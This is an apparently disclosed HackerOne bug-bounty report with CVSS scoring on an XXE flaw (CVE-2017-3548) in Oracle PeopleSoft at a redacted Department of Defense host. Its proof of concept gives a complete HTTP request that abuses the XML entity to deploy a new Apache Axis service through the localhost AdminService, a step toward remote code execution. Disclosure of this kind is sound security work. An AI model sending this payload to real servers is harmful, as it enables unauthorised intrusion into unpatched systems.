U.S. Dept Of Defense: XXE with RCE potential on the https://█████████ (CVE-2017-3548)

2019-10-0918:41:26

sp1d3rs

hackerone.com

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:N/A:P

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

LOW

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

AI Score

6.4

Confidence

Low

JSON

##Description
Hello. I was able to identify XXE on the https://███████
It is CVE in Oracle PeopleSoft (CVE-2017-3548)

##POC
I determined that instance is available on localhost port 80, so it’s possible to access /pspc/services/AdminService via XXE:

POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: ████████
Content-Type: application/xml
Content-Length: 608

&lt;!DOCTYPE a PUBLIC "-//B/A/EN" "http://localhost:80/pspc/services/AdminService?method=%21--%3E%3Cns1%3Adeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22h1testservice%22+provider%3D%22java%3ARPC%22%3E%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22org.apache.pluto.portalImpl.Deploy%22%2F%3E%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22%2A%22%2F%3E%3C%2Fns1%3Aservice%3E%3C%2Fns1%3Adeployment"&gt;

where h1testservice is test service name I’m trying to create.

The result:

https://██████████/pspc/services/h1testservice

█████
I created new service on server.

It’s possible to go further like other researcher did in the #227880 but I don’t think that dropping shell is necessary (since it’s already proved that we can create our Apache Axis service.

##Suggested fix
Patch Oracle PeopleSoft instance.